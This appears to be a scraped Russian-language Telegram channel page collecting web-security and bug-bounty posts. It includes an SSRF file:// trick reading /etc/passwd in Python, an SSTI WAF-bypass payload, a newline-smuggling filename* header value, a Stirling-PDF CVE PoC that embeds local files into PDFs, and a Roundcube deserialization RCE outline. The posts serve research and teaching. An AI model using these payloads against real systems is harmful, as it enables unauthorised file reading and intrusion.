- Последний пост
- 24 нояб.
- Последнее чтение
- 12:41
- Постов за неделю
- 0
- Всего постов
- 20
- Тип
- открытый
- Язык
- русский
- В каталоге с
- 12 авг.
- 1/24сутки в ленте
- —
- 1/48двое суток
- —
- 1/72трое суток
- —
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
видео или голосовое, без подписи
file://localhost/etc/passwd что вернёт? Да, вернётся /etc/passwd. В RFC 8089, верный формат протокола описан как file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path> Причём, в <host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок from urllib.request import urlopen content = urlopen( "file://yoogle.com/etc/passwd", timeout=2, ).read().decode('utf-8') print(content) Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня. В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними. Представим, ты нашёл SSTI, но WAF блокирует символ $ Что делать? Неприятно, но не критично, ведь в Python / Perl возможно представить символ через \N{CHARACTER NAME}. Пример обхода фильтра \N{dollar sign}{7*7} == ${7*7} == 49 Уже на стену лезешь? Погоди, я с тобой ещё не закончил. Давай дальше по загрузке файлов. Видел же в Content-Disposition есть параметр filename? В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты 😱 # RFC 6266 filename="image.png" # RFC 8187 filename*=UTF8''image%0a.png RFC 8187 вводит новые правила для filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . . FOMO карусель закрыта. Как восстановишь силы, пробегись по статье автора ради: ⚀ разбор CVE из-за проблем синтаксиса [^] ⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^] ⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^] Затем разнеси CTF по ресерчу 1. обход фильтров SSTI [^] 2. иной подход к протоколу file:// [^] 3. пролом parse_url в PHP [^] #web #waf_bypass
📈 #наработки #defense #offense #web #web3 #malware Видели историю про BSidesNYC? Выступила с этой статьёй в Нью-Йорке, в колледже уголовного правосудия имени Джона Джея ⚡️ А тот самый доклад Neplox из Токио и Сеула про уязвимости, обнаруженные в известных криптокошельках — ‟Атакуем криптокошельки: свежий взгляд на безопасность браузерных расширений”, но в Москве, на PHDays, видели? 🤔 ➡Теперь в тексте: собрала и проанализировала исходный код клиентских и серверных частей дрейнеров, заточенных под сеть TON, чтобы понимать, какие недостатки продуктов они используют для своей работы; 🧩 ‟Down the Drain: Unpacking TON of Crypto Drainers” Оказалось, что многие из них эксплуатируют фичи TON Connect – прослойки между приложением и кошельком – в свою пользу, а потому разобрала не только архитектуру самих дрейнеров, но и особенности реализации данного интерфейса между приложением и кошельками, благодаря которым скрывать вредоносную активность становится проще. На фоне самих вредоносных приложений рассмотрим такие возможности, как: ▪️Подделка origin и данных о приложении ▪️Перерисовка UI: добавление произвольных кошельков и сокрытие легитимных ▪️Управление поведением: трекинг событий и управление выбором пользователя ▪️Управление данными: Local Storage и Bridge MitM ➡️Из всех дрейнеров выбрала 5 самых репрезентативных и распределила их по уровням, от самого элементарного к самому комплексному, каждый из которых представляет из себя новую ступень для комфортного погружения в связанную тему: 0️⃣ Level 0: Перенаправление, Проблема верификации, Подделка источника, Telegram боты 1️⃣ Level 1.0: TON, NFT, Jetton, Переписанные библиотеки 1️⃣ Level 1.1: Перерисовка UI, Произвольные кошельки, Имперсонация легитимных кошельков 1️⃣ Level 1.2: Вызов действий, Отслеживание событий 2️⃣ Level 2: Local Storage, Компоненты TON Connect, TON Connect Bridge MitM 💻 Продукты: TON Connect, Tonkeeper, MyTonWallet, TON Wallet, Telegram Wallet, XTON Wallet, ... // Время чтения: ~30 минут ➡Enjoy! 🙇♂ @HaHacking 🐇
видео или голосовое, без подписи
Всем ку, хацкеры 👋 На стенде WB (за подписку на канал) выдаем промики на +10.000р к вашему отчету, кто багхантит или хочет багхантить на вб будет приятным бонусом Так же выдаем тестовые учетки ( например Менеджер ПВЗ ) До встречи на стенде! 🌟
James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к моему большому респекту, подкрепил все это доступной лабой на Portswigger. Публичного решения нет, но лаба довольно простая. Теперь можно убивать HTTP/1.1 на реальных целях.
Уязвимости в Electron-приложениях: RCE через небезопасную конфигурацию В данной статье мы рассмотрим эксплуатацию приложений с отключенными параметрами contextIsolation: false и sandbox: false, что позволило нам выполнить произвольный код на целевой системе. https://blog.deteact.ru/electron-rce/
Server-Side XSS → SSRF → Компрометация облачной инфраструктуры: как одна картинка стоила целого облака В этой статье разберем атаку, начавшуюся с уязвимости XSS в генераторе изображений и завершившуюся получением полного доступа к облачной инфраструктуре. https://blog.deteact.ru/serverside-xss-ssrf-cloud-hacking/
Сегодня в лайв-режиме знакомились с анализом кода на примере SSRF в Stirling-PDF (CVE-2025-46568): чтение локальных файлов через WeasyPrint. Не было особо важно, какая CVE. Главное — потренировать анализ кода 🏃♂️ Stirling-PDF — это веб-приложение для работы с PDF (конвертация, редактирование). В версиях до 0.45.0 обнаружена SSRF-уязвимость, позволяющая атакующему читать локальные файлы на сервере через обработку HTML в WeasyPrint ⚠️ Суть уязвимости: 1. Приложение некорректно фильтрует HTML-контент, загруженный по URL; 2. WeasyPrint поддерживает тег <link rel="attachment">, который встраивает локальные файлы (file://) в PDF как скрытые вложения. Основная ошибка — отсутствие санитизации HTML перед рендерингом: // 1. Принимает URL и проверяет только схему http/https if (!URL.matches("^https?://.*") || !GeneralUtils.isValidURL(URL)) { throw new IllegalArgumentException("Invalid URL format provided."); } // 2. Передаёт URL в WeasyPrint без очистки HTML List<String> command = new ArrayList<>(); command.add(runtimePathConfig.getWeasyPrintPath()); command.add(URL); // HTML может содержать <link rel="attachment" href="file:///etc/passwd"> command.add("--pdf-forms"); command.add(tempOutputFile.toString()); // 3. WeasyPrint рендерит PDF с вложенными файлами ProcessExecutor.runCommandWithOutputHandling(command); PoC: <!DOCTYPE html> <html> <head> <link rel="attachment" href="file:///etc/passwd"> </head> <body></body> </html> Если Вам интересен анализ кода или Вы хотите познакомиться, присоединяйтесь к Discord и заходите на следующие встречи! 🔍
🛡️ Public Pentesting Reports — архив реальных отчётов по взлому Репозиторий на GitHub собирает более 200 публичных отчётов по тестированию на проникновение от компаний и независимых исследователей. 📂 Что внутри: • Взлом web‑приложений, облаков, корпоративной инфраструктуры • Настоящие кейсы от Google, Yahoo, HackerOne, NCC Group и др. • Отчёты в формате PDF, Markdown, блоги и презентации • Отличная база для обучения, анализа атак и построения защиты 🧠 Полезно для: • Пентестеров и Bug Bounty‑исследователей • Разработчиков — чтобы видеть, как реально ломают продукты • Специалистов по безопасности — для тренингов и анализа рисков • Всех, кто хочет углубиться в практику Offensive Security 📎 GitHub: github.com/juliocesarfort/public-pentesting-reports @linuxkalii
🔥 9.9 Critical Post Auth RCE для Roundсube Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения. ?_task=settings&_action=upload&_from=mail%2Finbox Пошагово, как работает эксплоит: 1. Подменяет _from сериализованным объектом. 2. Заинжекченное значение подтягивается в сессию. 3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine. 4. Во время вызова GPG-логики, Roundcube вызывает unserialize(). 5. Триггерится код из первого шага exploit // nuclei // research
У intigriti вышла статья-руководство, по обнаружению скрытых параметров 😒 В данной статье рассматриваются эффективные методы выявления скрытых параметров, а также представлены инструменты с открытым исходным кодом, которые помогут автоматизировать этот процесс Ссылка на статью
Как вам phdays? чем занимались эти 3 дня? Я в основном заводил новые знакомства и общался со знакомыми коллегами 🦆 Много кто пишет про то какие доклады им понравились, я бы выделил доклад своего друга, он достаточно содержательный и может помочь решить вам вопросы с автоматизацией и реконом перед тестированием приложения 🤩Источники данных для фаззинга API веб-приложений
👋 Хочу поделиться интересным ресурсом, который может быть полезен при эксплуатации уязвимости DNS rebinding Ресурс позволяет использовать два IP адреса (публичный и локальный) для получения доменного имени, которое мы будем использовать в эксплуатации 🤷♀ Суть работы, если кратко: возвращается сначала A запись с публичным IP адресом и низким ttl, по истечению ttl при повторном обращении по доменному имени A запись будет содержать локальный IP адрес 🐸 ссылка на ресурс: тык github: клац
Eсть у меня один приятель, с которым время от времени случаются продуктивные коллабы на bug bounty. Причём он даже не багхантер, а скорее разработчик на консалтинге, который однажды соприкоснулся с моим репортом. В очередной раз он притащил в наш чат какие-то результаты в виде self-XSS. Но, к моему удивлению, он не оставил эту историю как есть, а допихал self-XSS через wkhtmltopdf и wicked_pdf(Ruby wrapper) в максимально опасную RCE. Причём с RCE его явно хотели прокатить в оценке критичности, ну и я ему подсказал, в каких файлах можно пошариться для определения действительно правильной критичности. В итоге он получил заслуженный critical. И даже написал статейку об этой находке. PS: мне кажется я бы даже не стал пытаться допинывать self-xss. Но видимо пришло время пересмотреть свои взгляды на мир client-side issues🙈 https://medium.com/@handball10/from-self-xss-to-rce-in-ruby-on-rails-1f9f2d33c1cb
видео или голосовое, без подписи
видео или голосовое, без подписи
видео или голосовое, без подписи
видео или голосовое, без подписи
💻 Нейросети становятся все более популярными и полезными инструментами в различных областях, включая образование и самообучение Одним из ярких примеров такого применения является Roadmap.sh — проект, который использует мощь нейросетей для создания персонализированных учебных планов 🥱 Выбираете тему, выбираете уровень сложности, немного дополнительной информации и план для вашего обучения готов . Удобно если нужно что то с нуля изучить, подготовиться к собесу или подготовиться к сдаче экзамена. 🤩 Уже есть готовые гайды по разным популярным темам и ответы на частые вопросы, а так же готовые роадмапы для изучения новой для вас темы.